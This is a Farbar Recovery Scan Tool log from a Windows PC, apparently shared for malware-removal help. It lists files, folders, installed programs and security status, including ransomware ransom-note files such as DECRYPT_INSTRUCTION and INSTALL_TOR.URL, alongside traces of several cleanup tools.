2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\Roaming\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\Roaming\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\AppData\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\ProgramData\INSTALL_TOR.URL
2014-10-30 20:03 - 2014-10-30 20:03 - 00000424 _____ () C:\ProgramData\@system.temp
2014-10-30 20:03 - 2014-10-30 20:03 - 00000160 ____H () C:\ProgramData\@system3.att
2014-10-30 20:03 - 2014-10-30 20:03 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\FrameworkUpdate7
2014-10-30 17:23 - 2014-10-31 14:22 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-30 17:22 - 2014-10-31 08:05 - 00000000 ____D () C:\Users\scalac\Desktop\mbar
2014-10-30 16:15 - 2014-10-30 16:15 - 00000000 ____D () C:\Program Files\ESET
2014-10-30 15:42 - 2014-10-30 15:42 - 00000912 _____ () C:\Users\scalac\Desktop\JRT.txt
2014-10-30 15:39 - 2014-10-30 15:39 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 15:36 - 2014-11-03 08:32 - 00000280 _____ () C:\Windows\setupact.log
2014-10-30 15:36 - 2014-10-31 14:22 - 00003042 _____ () C:\Windows\PFRO.log
2014-10-30 15:36 - 2014-10-30 15:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-30 14:36 - 2014-10-31 08:58 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-10-30 14:19 - 2014-10-30 14:19 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-10-30 11:58 - 2014-10-30 11:58 - 24489269 _____ () C:\Users\scalac\Downloads\setup_free.exe
2014-10-29 16:07 - 2014-10-30 20:14 - 00000000 ____D () C:\Windows\Minidump
2014-10-29 15:03 - 2014-10-29 15:11 - 00000000 ____D () C:\NPE
2014-10-29 14:57 - 2014-10-29 14:58 - 00000000 ____D () C:\ProgramData\SMR430
2014-10-29 14:52 - 2014-10-29 15:03 - 00000000 ____D () C:\Users\scalac\AppData\Local\NPE
2014-10-29 14:52 - 2014-10-29 14:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-29 11:43 - 2014-10-29 11:44 - 00002000 _____ () C:\Users\scalac\Desktop\attach.txt
2014-10-29 11:39 - 2014-10-29 11:39 - 00688992 ____R (Swearware) C:\Users\scalac\Desktop\dds.com
2014-10-29 11:37 - 2014-10-29 16:43 - 00087200 _____ () C:\ProgramData\wrnhoah.tmp
2014-10-28 08:09 - 2014-10-28 08:09 - 00854448 _____ () C:\Users\scalac\Desktop\SecurityCheck.exe
2014-10-24 10:57 - 2014-10-24 10:57 - 00001368 _____ () C:\ProgramData\@system.att
2014-10-24 10:54 - 2014-10-24 10:57 - 00001104 ____H () C:\ProgramData\@system2.att
2014-10-24 10:54 - 2014-10-24 10:54 - 00000448 ____H () C:\Users\scalac\AppData\Roaming\麽鎒駓覜
2014-10-24 04:15 - 2014-10-31 10:37 - 00000000 ____D () C:\Users\scalac\AppData\Local\CrashDumps
2014-10-23 16:27 - 2014-10-31 17:03 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-23 16:27 - 2014-10-23 16:27 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-23 16:09 - 2014-10-23 16:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\scalac\Downloads\rkill.exe
2014-10-23 15:34 - 2014-10-23 16:17 - 00002288 _____ () C:\Users\scalac\Desktop\Rkill.txt
2014-10-23 12:54 - 2014-10-30 17:17 - 00734791 _____ () C:\Windows\WindowsUpdate.log
2014-10-23 12:42 - 2014-10-23 12:42 - 00049984 _____ () C:\ComboFix.txt
2014-10-23 12:31 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-23 12:31 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-23 12:31 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-23 12:31 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-23 12:30 - 2014-10-30 20:06 - 00000000 ____D () C:\Qoobox
2014-10-23 12:29 - 2014-10-23 12:41 - 00000000 ____D () C:\Windows\erdnt
2014-10-23 11:06 - 2014-10-30 20:03 - 00000000 ____D () C:\AdwCleaner
2014-10-23 11:06 - 2014-10-23 11:06 - 00000000 ____D () C:\Users\scalac\AppData\Local\Macromedia
2014-10-23 09:48 - 2014-10-23 09:48 - 00000937 _____ () C:\Users\Public\Desktop\Speccy.lnk
2014-10-23 09:48 - 2014-10-23 09:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy
2014-10-23 09:48 - 2014-10-23 09:48 - 00000000 ____D () C:\Program Files\Speccy
2014-10-23 09:40 - 2014-10-30 20:08 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\Mozilla
2014-10-23 09:40 - 2014-10-30 15:36 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-10-23 09:40 - 2014-10-23 09:41 - 00000000 ____D () C:\Users\scalac\AppData\Local\Mozilla
2014-10-23 09:40 - 2014-10-23 09:40 - 00001117 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-10-23 09:40 - 2014-10-23 09:40 - 00001105 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-10-23 09:40 - 2014-10-23 09:40 - 00000000 ____D () C:\ProgramData\Mozilla
2014-10-23 08:55 - 2014-10-31 07:39 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-23 08:33 - 2014-10-23 15:46 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-23 08:33 - 2014-10-23 15:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-23 08:32 - 2014-10-30 17:22 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-23 08:32 - 2014-10-23 17:33 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-23 08:32 - 2014-10-01 10:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-23 08:32 - 2014-10-01 10:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-22 14:26 - 2014-10-22 14:29 - 00042784 _____ () C:\Users\scalac\Documents\Football 2014.xls
2014-10-22 07:02 - 2014-10-22 07:02 - 00014784 _____ () C:\Users\scalac\Documents\World Series Boxes 2014.xlsx
2014-10-17 08:02 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-17 08:02 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-17 08:02 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-17 07:04 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-17 07:04 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-17 07:04 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-17 07:04 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-17 07:04 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-17 07:04 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-17 07:04 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-17 07:04 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-17 07:04 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-17 07:04 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-17 07:04 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-17 07:04 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-17 07:04 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-17 07:04 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-17 07:04 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-17 07:04 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-17 07:04 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-17 07:04 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-17 07:04 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-17 07:04 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-17 07:04 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-17 07:04 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-17 07:04 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-17 07:04 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-17 07:04 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-17 07:04 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-17 07:04 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-17 07:04 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-17 07:04 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-17 07:04 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-16 11:14 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 11:14 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 11:14 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 11:11 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 11:07 - 2014-09-28 19:43 - 02387968 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 11:05 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-16 11:04 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-10-16 11:03 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-10-16 11:01 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-10-15 08:31 - 2014-10-15 08:32 - 00042784 _____ () C:\Users\scalac\Documents\'14WK07 (2).xls
2014-10-10 14:06 - 2014-10-10 14:08 - 00030496 _____ () C:\Users\scalac\Documents\TIME SHEET 10 17 14.xls
2014-10-09 07:57 - 2014-10-09 07:57 - 00042784 _____ () C:\Users\scalac\Documents\14WK06.xls

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-03 11:32 - 2011-11-29 09:33 - 00000232 _____ () C:\Windows\system32\config\netlogon.ftl
2014-11-03 11:27 - 2012-05-31 10:28 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-03 08:40 - 2009-07-13 23:34 - 00032480 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-03 08:40 - 2009-07-13 23:34 - 00032480 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-03 08:32 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-31 17:03 - 2010-11-20 16:01 - 00849650 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-31 08:07 - 2010-11-20 19:47 - 00000000 ____D () C:\Windows\CSC
2014-10-30 20:11 - 2012-12-06 14:52 - 00000000 ____D () C:\Users\scalac\Documents\Signatures
2014-10-30 20:11 - 2012-12-06 14:52 - 00000000 ____D () C:\Users\scalac\Documents\Outlook PSTs
2014-10-30 20:11 - 2012-12-06 12:41 - 00000000 ____D () C:\Users\scalac
2014-10-30 20:08 - 2013-02-27 11:57 - 00000000 ____D () C:\Users\scalac\AppData\Local\NEC
2014-10-30 20:08 - 2012-12-07 09:16 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\Adobe
2014-10-30 20:07 - 2013-03-27 11:48 - 00000000 ____D () C:\Users\scalac\AppData\Local\AOL
2014-10-30 20:07 - 2011-11-29 12:41 - 00000000 ____D () C:\Users\alvayerog
2014-10-30 20:06 - 2014-07-23 15:13 - 00000000 ____D () C:\ProgramData\Symantec
2014-10-30 20:06 - 2011-11-29 08:57 - 00000000 ____D () C:\Users\Administrator
2014-10-30 20:05 - 2014-05-15 08:03 - 00000000 ____D () C:\ProgramData\Citrix
2014-10-30 20:04 - 2011-11-29 08:35 - 00000000 ____D () C:\dell
2014-10-30 14:55 - 2011-11-29 09:29 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-30 14:55 - 2011-11-29 09:29 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-29 19:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\LogFiles
2014-10-24 07:26 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-23 12:42 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-10-23 12:41 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-23 11:27 - 2012-05-31 10:28 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-10-23 11:27 - 2011-11-29 14:26 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-10-23 11:05 - 2012-12-07 12:32 - 00000000 ____D () C:\Users\scalac\AppData\Local\Adobe
2014-10-23 10:36 - 2012-12-06 14:52 - 33539360 _____ () C:\Users\scalac\Documents\CSCALA.PST
2014-10-23 09:54 - 2011-11-29 11:55 - 00000000 ____D () C:\Windows\Panther
2014-10-23 09:47 - 2011-11-29 09:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-23 08:37 - 2013-05-10 07:38 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\Malwarebytes
2014-10-23 08:32 - 2011-11-29 09:30 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-22 12:37 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-22 09:15 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-22 06:30 - 2009-07-13 23:33 - 00341168 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-22 06:28 - 2014-05-02 15:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-17 08:01 - 2011-11-29 14:28 - 00000000 ____D () C:\Program Files\Common Files\Adobe AIR
2014-10-17 07:02 - 2011-11-29 09:20 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-09 11:30 - 2014-07-23 15:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Symantec
2014-10-09 11:30 - 2014-07-23 15:13 - 00000000 ____D () C:\Program Files\Common Files\Altiris

Some content of TEMP:
====================
C:\Users\scalac\AppData\Local\temp\dllnt_dump.dll
C:\Users\scalac\AppData\Local\temp\Quarantine.exe
C:\Users\scalac\AppData\Local\temp\{05E6A4A8-EB4E-493C-BC90-876900B580E2}.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-30 07:38

==================== End Of Log ============================


Additional scan result of Farbar Recovery Scan Tool (x86) Version: 02-11-2014
Ran by ScalaC at 2014-11-03 11:37:03
Running from C:\Users\scalac\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Symantec Endpoint Protection (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Disabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Symantec Endpoint Protection (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 15.0.0.293 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.08) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
AIM for Windows (HKCU\...\AIM) (Version:  - AOL Inc.)
Altiris Application Metering Agent (Version: 7.5.3251.0 - Symantec Corporation) Hidden
Altiris Inventory Agent (Version: 7.5.3251.0 - Symantec Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.19 - Piriform)
Cisco Systems VPN Client 5.0.07.0410 (HKLM\...\{1CE60928-8325-49A8-8B06-633E48DD2B67}) (Version: 5.0.7 - Cisco Systems, Inc.)
Citrix online plug-in - web (HKLM\...\CitrixOnlinePluginPackWeb) (Version: 12.3.0.8 - Citrix Systems, Inc.)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1208.101.125 - ALPS ELECTRIC CO., LTD.)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
HP LaserJet Professional P1100-P1560-P1600 Series (HKLM\...\HP LaserJet Professional P1100-P1560-P1600 Series) (Version:  - )
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Standard 2010 (HKLM\...\Office14.STANDARD) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft SQL Server 2005 Backward compatibility (HKLM\...\{96327C3C-96BE-4C7A-A6F7-A71635E5949A}) (Version: 8.05.1054 - Microsoft Corporation)
Microsoft Visio Viewer 2013 (HKLM\...\{95150000-0052-0409-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation)
Mozilla Firefox 33.0.2 (x86 en-US) (HKLM\...\Mozilla Firefox 33.0.2 (x86 en-US)) (Version: 33.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 33.0 - Mozilla)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
NSSSLInstall (HKLM\...\{35818FB9-877D-43FA-878C-A6D06AFE839F}) (Version: 1.20.0000 - Black Box Network Services)
O2Micro Flash Memory Card Windows Driver (HKLM\...\InstallShield_{0CB3B7EE-52C7-4136-AF40-605567D90318}) (Version: 3.0.07.23 - O2Micro International LTD.)
O2Micro Flash Memory Card Windows Driver (Version: 3.0.07.23 - O2Micro International LTD.) Hidden
Patch Management Agent (Version: 7.5.3219.0 - Symantec) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM\...\{90140000-0012-0000-0000-0000000FF1CE}_Office14.STANDARD_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Software Management Solution Plugin (Version: 7.5.3219.0 - Altiris Inc.) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.26 - Piriform)
Symantec Endpoint Protection (HKLM\...\{78BC019C-656D-4458-A860-6977AA85049A}) (Version: 12.1.4112.4156 - Symantec Corporation)
Symantec Management Agent (HKLM\...\AltirisAgent) (Version: 7.5.3193.0 - Symantec Corporation)
Tigerpaw CRM+ (HKLM\...\{0BA5748D-A033-4922-B526-02C047018E16}) (Version: 10.7.6 - Tigerpaw Software, Inc.)
UC700 Client (HKLM\...\{289043F4-94B9-4021-BDBD-3B5504C3E24B}) (Version: 10.0.1082 - NEC Corporation)
UNIVERGE Soft Client SP350 (Version: 2.00.0000 - NEC) Hidden
UNIVERGE Soft Client SP350 R5.50.0.5 UNIVERGE SV8300 Invisible Mode (HKLM\...\{74A8A18F-E299-4BB0-BF09-D7FB75CA26DB}) (Version: 5.50.0.5 - NEC)
WinRAR 4.11 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.11.0 - win.rar GmbH)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0049A510-CE20-302F-A9C6-722FEE7FEE67}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{01FC31CF-8455-3064-B22D-F7E908F8D7DE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{03FA88B8-CCD8-32BA-9ED4-1C37405D98CD}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{062A92D5-4E70-381B-83A6-13B1C83BB070}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0875D743-741B-306B-B263-4F1EBCB6C0E1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{094557C8-8D13-3A57-93CD-48CDFBC346A4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{09A0F791-40F8-3FCB-9C91-DC6F2A4DC96B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0AEB5AAD-06AE-3748-800A-63BFB53940BB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0C377237-DC8B-3D6D-BCF8-E4F156760E9B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0CE87BF5-DA17-3EA0-8B90-79E59792F4F3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0D7A82DE-6A6D-3BB1-8E24-386FB792930D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
